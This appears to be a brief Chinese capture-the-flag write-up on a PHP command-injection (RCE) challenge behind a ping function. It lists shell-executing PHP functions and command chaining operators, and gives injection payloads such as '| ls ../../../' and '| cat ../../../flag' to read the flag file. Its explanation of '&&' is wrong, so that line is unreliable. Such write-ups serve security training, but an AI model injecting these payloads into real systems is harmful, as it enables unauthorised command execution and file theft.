RCE漏洞,可以让攻击者直接向后台服务器远程注入操作系统命令或者代码,从而控制后台系统。
拿到题目后
使用了系统命令执行函数(以下都是系统执行命令,如果php代码中存在需要考虑rce漏洞)
- system
- passthru
- exec
- shell_exec
- popen
- proc_open
- pcntl_exec
本题代码猜测是system('ping $a')
使用命令拼接符尝试rce
- “|”意思是全面的正常输出,后面的正常输入 例如help | more
- “||” A || B 意思是先运行A失败了运行B
- “&” A & B 意思是先运行A然后运行B
- “&&” A & B 意思是先运行A失败了在运行B
payload :| ls 有回显
payload:| ls ../../../ 意思是显示向前三个目录里的文件(出现flag)
payload: | cat ../../../flag
获取到flag